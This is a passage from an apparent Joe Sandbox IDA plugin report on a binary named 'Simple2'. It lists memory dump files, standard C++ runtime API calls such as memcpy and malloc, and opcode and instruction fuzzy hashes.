              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Concurrency::cancel_current_taskFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@std::_
              • String ID:
              • API String ID: 762505753-0
              • Opcode ID: 545df3c9766ed185f8b794c35ee2b3ec209f071c21cbcf1c646a21f7ed853349
              • Instruction ID: 5eaa46047dabe80bf2b8fdbc92a5c78128802307e4b0566040b8c5d7b480b637
              • Opcode Fuzzy Hash: 545df3c9766ed185f8b794c35ee2b3ec209f071c21cbcf1c646a21f7ed853349
              • Instruction Fuzzy Hash: 46311A22A09B4581EB249B11E48056D6B70FB88FD4F48163ADE9E87B64DF3CE861C700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 070655a0978f02405b548f76d8b7b4ea2e98303e64286a190ea9cd260f08c51b
              • Instruction ID: 10ed88f71d9ecfe7685878bde3dd1fd8ab66ba429d1bc41c9016034d28bbc9a5
              • Opcode Fuzzy Hash: 070655a0978f02405b548f76d8b7b4ea2e98303e64286a190ea9cd260f08c51b
              • Instruction Fuzzy Hash: 1D41DF63B08A4191EA109B16A9046AD6B71EB48FF0F54473ADE7E87FD4DE3CD861C304
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000002,?,00007FF6D5CA8A88), ref: 00007FF6D5CA80FB
              • memcpy.VCRUNTIME140(?,00000002,?,00007FF6D5CA8A88), ref: 00007FF6D5CA8121
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA813C
              • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6D5CA8A88), ref: 00007FF6D5CA81A5
              • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ.MSVCP140(?,?,?,?,?,?,?,00007FF6D5CA8A88), ref: 00007FF6D5CA81AE
                • Part of subcall function 00007FF6D5CAB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: D@std@@@std@@U?$char_traits@$??1?$basic_ios@??1?$basic_iostream@Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmallocmemcpy
              • String ID:
              • API String ID: 4149368473-0
              • Opcode ID: f3f1774fee9b6a742e75e893d1d9fdb020d8d560f48af612a45d390866cab7c4
              • Instruction ID: 61d53c1b72c63d869685d7f882757d32105b0f1221ee0e38304f5d2df66c8297
              • Opcode Fuzzy Hash: f3f1774fee9b6a742e75e893d1d9fdb020d8d560f48af612a45d390866cab7c4
              • Instruction Fuzzy Hash: AA41A023B05B4282EA549B65E4447AC6770EB44FE4F14863ADF2D47BD2DE38D8A6C300
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: __current_exception__current_exception_contextterminate
              • String ID: csm
              • API String ID: 2542180945-1018135373
              • Opcode ID: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction ID: 23808e5e06762baa1ab9b4fcb7edb304ec4c5f33d2237e744fab290558d2468d
              • Opcode Fuzzy Hash: d3b79f1d4ed2cf87534eefe888d4520da953d68ce7e88eb7b161ba8e8e1dee64
              • Instruction Fuzzy Hash: 4CF0E737605A45CAC7149F21E8805AC3774F749B88F495125FE4D87B55CF38D8A18340
              APIs
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CAA002
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CAA048
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CAA052
                • Part of subcall function 00007FF6D5CAB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CAA08E
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 96873907a9cf4fea664ace19dd2153a676c7447fca7a9d11e1bd71d37fddedd0
              • Instruction ID: 1a655ac205a91ab51e676be40120646c18dc0988528c1072ba0dd83fafad5f70
              • Opcode Fuzzy Hash: 96873907a9cf4fea664ace19dd2153a676c7447fca7a9d11e1bd71d37fddedd0
              • Instruction Fuzzy Hash: 8441AC26B08A4181EA149B11E9449ADAB75AB08FF0F54473ADE7E87FD4DE7CE861C304
              APIs
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CA9E58
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CA9E9B
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00000000,00007FF6D5CAA81F), ref: 00007FF6D5CA9EA5
                • Part of subcall function 00007FF6D5CAB188: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6D5CA1079), ref: 00007FF6D5CAB1A2
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA9EE0
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 54496fb58b889501c0e1bb3a74d0beea14c82f2c10c546aaa0415fc8883c2b09
              • Instruction ID: 57834aedc63691cf4e252e967b7b431017715bdb35f1c79091deb77197f3d8fd
              • Opcode Fuzzy Hash: 54496fb58b889501c0e1bb3a74d0beea14c82f2c10c546aaa0415fc8883c2b09
              • Instruction Fuzzy Hash: B841DE22B08A4181EA149B11A5455BDAA74AB04FF4F54473ADE7E87FD6DF3CE862C300
              APIs
              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,00007FF6D5CA4851), ref: 00007FF6D5CA9A19
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6D5CA4851), ref: 00007FF6D5CA9A4E
              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FF6D5CA4851), ref: 00007FF6D5CA9A5E
              • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6D5CA9A92
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: a024b2ebc0ba59a1b78b339bf0e64b197d729fe7143313806a72fec7981749ca
              • Instruction ID: eedd4ab254d46742227f206f6924dec07d06bb51c890d0f5032d39ff8b442c77
              • Opcode Fuzzy Hash: a024b2ebc0ba59a1b78b339bf0e64b197d729fe7143313806a72fec7981749ca
              • Instruction Fuzzy Hash: BE41E323B19A4190EA10DB11A44456D6A74FB48FF0F54873AEE7E87BD4EE3CD8A1C300
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e7db282e29bddddf1267576aac1fe13729b1fc00772b1e8be868d075bea65a2a
              • Instruction ID: 91feba418456433264fe43fbf6f25ecffd147887916fa4d69beafcc844ddd0a7
              • Opcode Fuzzy Hash: e7db282e29bddddf1267576aac1fe13729b1fc00772b1e8be868d075bea65a2a
              • Instruction Fuzzy Hash: A6510C73608A8285DB148F29E45076D77B5FB84FD8F54413BDA5D87BA8DE28C854C700
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: d32795b5364341438e5f21e4d5ffad7b052a27a8c85df0ccc87315fa04e58b2a
              • Instruction ID: 5d8cb085eddc0fae72212017eeaee487ac6f79ce7263bf8a056d238ca0a46ffa
              • Opcode Fuzzy Hash: d32795b5364341438e5f21e4d5ffad7b052a27a8c85df0ccc87315fa04e58b2a
              • Instruction Fuzzy Hash: D5311523B09A4195EE149F62D9442AD6B71EB08FE0F14463ADF5D87FC9EE7CD8A08300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
              • String ID:
              • API String ID: 1155477157-0
              • Opcode ID: 169160d15526732c8a96bd8d8d58e6bb0ddfd76f2d29cc5e8210dcf89adcbc02
              • Instruction ID: 82fb587001b78bf482714238203a7539be52f84d9853cd5d24025ab224e51c05
              • Opcode Fuzzy Hash: 169160d15526732c8a96bd8d8d58e6bb0ddfd76f2d29cc5e8210dcf89adcbc02
              • Instruction Fuzzy Hash: AD315023B0564695EA189B51A81057C2AB4BB45FF8F144B3ADE3D87FD1DF38EDA28340
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
              • String ID:
              • API String ID: 1775671525-0
              • Opcode ID: 12abe477f0d9fecc3484fd8622d244d8825daa75e12ddb83e1da9318b497b56a
              • Instruction ID: 45964534ae2f5477c6725e52fbeb7f18e8796ccf53a42e7c08620a2a85dcff7d
              • Opcode Fuzzy Hash: 12abe477f0d9fecc3484fd8622d244d8825daa75e12ddb83e1da9318b497b56a
              • Instruction Fuzzy Hash: 2C311623B09781A1EE109B11A9046ADAA71EB05FD0F88463ADF6D87FD5DF7CE861C300
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2360525446.00007FF6D5CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6D5CA0000, based on PE: true
              • Associated: 00000000.00000002.2360505710.00007FF6D5CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360578068.00007FF6D5CAD000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360595538.00007FF6D5CB4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2360616047.00007FF6D5CB5000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_7ff6d5ca0000_Simple2.jbxd
              Similarity
              • API ID: memcpy$Concurrency::cancel_current_task
              • String ID:
              • API String ID: 326894585-0
              • Opcode ID: bdb282f226c54cd3a684e266ba619150567f3ad3138a523370898103b53848e2
              • Instruction ID: 08e6a4629f43c48a370a9ad2eba33b2a0dfd78fc5efd1f3c3c6c361d7ddf4ddc
              • Opcode Fuzzy Hash: bdb282f226c54cd3a684e266ba619150567f3ad3138a523370898103b53848e2
              • Instruction Fuzzy Hash: 2021F963A09B4644FA259B51A54177C2AA49B04FE8F540B3ADE6D87FC1DF3CA8A28300